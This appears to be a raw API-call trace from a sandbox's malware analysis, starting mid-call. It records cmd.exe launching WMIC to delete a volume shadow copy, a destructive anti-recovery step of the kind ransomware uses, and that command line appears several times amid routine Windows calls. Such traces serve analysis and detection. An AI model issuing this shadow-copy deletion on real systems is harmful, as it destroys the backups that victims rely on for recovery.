lpcbData=0x16e824*=0x1000) returned 0x2 [0114.892] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x0, lpcbData=0x16e824*=0x4) returned 0x0 [0114.892] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x9, lpcbData=0x16e824*=0x4) returned 0x0 [0114.892] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x4, lpData=0x16e840*=0x9, lpcbData=0x16e824*=0x4) returned 0x0 [0114.892] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e820, lpData=0x16e840, lpcbData=0x16e824*=0x1000 | out: lpType=0x16e820*=0x0, lpData=0x16e840*=0x9, lpcbData=0x16e824*=0x1000) returned 0x2 [0114.892] RegCloseKey (hKey=0x44) returned 0x0 [0114.892] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517457 [0114.892] srand (_Seed=0x5f517457) [0114.892] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete" [0114.892] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete" [0114.892] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.893] GetProcessHeap () returned 0x2d0000 [0114.893] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2eab40 [0114.893] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2eab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.893] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.893] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.893] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.893] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.893] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.893] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.893] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.893] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.893] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.893] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.893] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.893] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.893] GetProcessHeap () returned 0x2d0000 [0114.893] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e9620 | out: hHeap=0x2d0000) returned 1 [0114.893] GetEnvironmentStringsW () returned 0x2e8b90* [0114.894] GetProcessHeap () returned 0x2d0000 [0114.894] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xa94) returned 0x2ead60 [0114.894] FreeEnvironmentStringsW (penv=0x2e8b90) returned 1 [0114.894] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aa4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.894] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa4f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.894] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.894] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.894] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.894] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.894] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.894] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.894] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.894] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.894] GetProcessHeap () returned 0x2d0000 [0114.894] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x5c) returned 0x2eb800 [0114.894] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f630 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.895] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x16f630, lpFilePart=0x16f610 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x16f610*="Desktop") returned 0x25 [0114.895] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.895] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f340 | out: lpFindFileData=0x16f340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2eb870 [0114.895] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0114.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16f340 | out: lpFindFileData=0x16f340*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2eb870 [0114.895] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0114.895] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.895] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16f340 | out: lpFindFileData=0x16f340*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2eb870 [0114.896] FindClose (in: hFindFile=0x2eb870 | out: hFindFile=0x2eb870) returned 1 [0114.896] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.896] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.896] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.896] GetProcessHeap () returned 0x2d0000 [0114.896] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ead60 | out: hHeap=0x2d0000) returned 1 [0114.896] GetEnvironmentStringsW () returned 0x2eb870* [0114.896] GetProcessHeap () returned 0x2d0000 [0114.896] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2ec360 [0114.896] FreeEnvironmentStringsW (penv=0x2eb870) returned 1 [0114.896] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa5c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.896] GetProcessHeap () returned 0x2d0000 [0114.896] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb800 | out: hHeap=0x2d0000) returned 1 [0114.896] GetProcessHeap () returned 0x2d0000 [0114.897] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4016) returned 0x2ece50 [0114.897] GetProcessHeap () returned 0x2d0000 [0114.897] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe4) returned 0x2e9680 [0114.897] GetProcessHeap () returned 0x2d0000 [0114.897] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece50 | out: hHeap=0x2d0000) returned 1 [0114.897] GetConsoleOutputCP () returned 0x1b5 [0114.898] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa5bfe0 | out: lpCPInfo=0x4aa5bfe0) returned 1 [0114.898] GetUserDefaultLCID () returned 0x409 [0114.898] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa57b50, cchData=8 | out: lpLCData=":") returned 2 [0114.898] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f740, cchData=128 | out: lpLCData="0") returned 2 [0114.898] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f740, cchData=128 | out: lpLCData="0") returned 2 [0114.898] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f740, cchData=128 | out: lpLCData="1") returned 2 [0114.898] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa6a740, cchData=8 | out: lpLCData="/") returned 2 [0114.898] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa6a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa6a460, cchData=32 | out: lpLCData="Tue") returned 4 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4aa6a420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa6a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa6a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa6a360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa6a700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa57b40, cchData=8 | out: lpLCData=".") returned 2 [0114.899] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa6a4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.899] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.900] GetProcessHeap () returned 0x2d0000 [0114.900] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x20c) returned 0x2e97e0 [0114.900] GetConsoleTitleW (in: lpConsoleTitle=0x2e97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.900] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.900] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.900] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.901] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.901] GetProcessHeap () returned 0x2d0000 [0114.901] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x4012) returned 0x2ece50 [0114.901] GetProcessHeap () returned 0x2d0000 [0114.901] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ece50 | out: hHeap=0x2d0000) returned 1 [0114.904] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0114.904] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0114.904] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0114.904] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0114.904] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0114.904] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0114.904] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0114.904] GetProcessHeap () returned 0x2d0000 [0114.904] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0) returned 0x2e9a00 [0114.904] GetProcessHeap () returned 0x2d0000 [0114.904] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x54) returned 0x2e9ac0 [0114.907] GetProcessHeap () returned 0x2d0000 [0114.907] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x9e) returned 0x2e9b20 [0114.908] GetConsoleTitleW (in: lpConsoleTitle=0x16f650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.909] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.909] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f1e0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f1c0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f1c0*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0114.909] GetProcessHeap () returned 0x2d0000 [0114.909] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x218) returned 0x2e9bd0 [0114.909] GetProcessHeap () returned 0x2d0000 [0114.909] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe2) returned 0x2e9df0 [0114.909] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0114.910] GetProcessHeap () returned 0x2d0000 [0114.910] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x420) returned 0x2d1320 [0114.910] SetErrorMode (uMode=0x0) returned 0x8001 [0114.910] SetErrorMode (uMode=0x1) returned 0x0 [0114.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x2d1330, lpFilePart=0x16eee0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x16eee0*="wbem") returned 0x18 [0114.910] SetErrorMode (uMode=0x8001) returned 0x1 [0114.910] GetProcessHeap () returned 0x2d0000 [0114.910] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2d1320, Size=0x54) returned 0x2d1320 [0114.910] GetProcessHeap () returned 0x2d0000 [0114.910] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2d1320) returned 0x54 [0114.910] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0114.910] GetProcessHeap () returned 0x2d0000 [0114.910] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x48) returned 0x2e9ee0 [0114.910] GetProcessHeap () returned 0x2d0000 [0114.910] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x7c) returned 0x2e9f30 [0114.910] GetProcessHeap () returned 0x2d0000 [0114.910] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9f30, Size=0x48) returned 0x2e9f30 [0114.911] GetProcessHeap () returned 0x2d0000 [0114.911] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9f30) returned 0x48 [0114.911] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.911] GetProcessHeap () returned 0x2d0000 [0114.911] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xe8) returned 0x2e9f90 [0114.915] GetProcessHeap () returned 0x2d0000 [0114.915] RtlReAllocateHeap (Heap=0x2d0000, Flags=0x0, Ptr=0x2e9f90, Size=0x7e) returned 0x2e9f90 [0114.915] GetProcessHeap () returned 0x2d0000 [0114.915] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2e9f90) returned 0x7e [0114.916] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.916] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x16ec50, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ec50) returned 0x2ea020 [0114.917] GetProcessHeap () returned 0x2d0000 [0114.917] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2e46c0 [0114.917] FindClose (in: hFindFile=0x2ea020 | out: hFindFile=0x2ea020) returned 1 [0114.917] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0114.917] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0114.917] GetConsoleTitleW (in: lpConsoleTitle=0x16f1a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.917] InitializeProcThreadAttributeList (in: lpAttributeList=0x16ef58, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x16ef18 | out: lpAttributeList=0x16ef58, lpSize=0x16ef18) returned 1 [0114.917] UpdateProcThreadAttribute (in: lpAttributeList=0x16ef58, dwFlags=0x0, Attribute=0x60001, lpValue=0x16ef08, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x16ef58, lpPreviousValue=0x0) returned 1 [0114.917] GetStartupInfoW (in: lpStartupInfo=0x16f070 | out: lpStartupInfo=0x16f070*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0114.917] GetProcessHeap () returned 0x2d0000 [0114.917] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x20) returned 0x2e46f0 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.918] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.919] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.919] GetProcessHeap () returned 0x2d0000 [0114.919] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e46f0 | out: hHeap=0x2d0000) returned 1 [0114.919] GetProcessHeap () returned 0x2d0000 [0114.919] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x12) returned 0x2e8a30 [0114.919] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.920] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x16ef90*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x16ef40 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{3DBBFF70-A67F-4333-8498-31E7BC089E0F}'\" delete", lpProcessInformation=0x16ef40*(hProcess=0x54, hThread=0x50, dwProcessId=0xb04, dwThreadId=0xb40)) returned 1 [0114.925] CloseHandle (hObject=0x50) returned 1 [0114.925] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0114.925] GetProcessHeap () returned 0x2d0000 [0114.925] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ec360 | out: hHeap=0x2d0000) returned 1 [0114.925] GetEnvironmentStringsW () returned 0x2ead60* [0114.925] GetProcessHeap () returned 0x2d0000 [0114.925] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xae8) returned 0x2eb850 [0114.925] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0114.925] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0116.240] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x16ee88 | out: lpExitCode=0x16ee88*=0x0) returned 1 [0116.240] CloseHandle (hObject=0x54) returned 1 [0116.240] _vsnwprintf (in: _Buffer=0x16f0f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x16ee98 | out: _Buffer="00000000") returned 8 [0116.241] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.241] GetProcessHeap () returned 0x2d0000 [0116.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb850 | out: hHeap=0x2d0000) returned 1 [0116.241] GetEnvironmentStringsW () returned 0x2ead60* [0116.241] GetProcessHeap () returned 0x2d0000 [0116.241] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eb880 [0116.241] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0116.241] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.241] GetProcessHeap () returned 0x2d0000 [0116.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2eb880 | out: hHeap=0x2d0000) returned 1 [0116.241] GetEnvironmentStringsW () returned 0x2ead60* [0116.241] GetProcessHeap () returned 0x2d0000 [0116.241] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0xb0e) returned 0x2eb880 [0116.241] FreeEnvironmentStringsW (penv=0x2ead60) returned 1 [0116.241] GetProcessHeap () returned 0x2d0000 [0116.241] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2e8a30 | out: hHeap=0x2d0000) returned 1 [0116.241] DeleteProcThreadAttributeList (in: lpAttributeList=0x16ef58 | out: lpAttributeList=0x16ef58) [0116.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.241] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.242] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.242] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4aa4e194 | out: lpMode=0x4aa4e194) returned 1 [0116.242] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.242] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4aa4e198 | out: lpMode=0x4aa4e198) returned 1 [0116.242] SetConsoleInputExeNameW () returned 0x1 [0116.242] 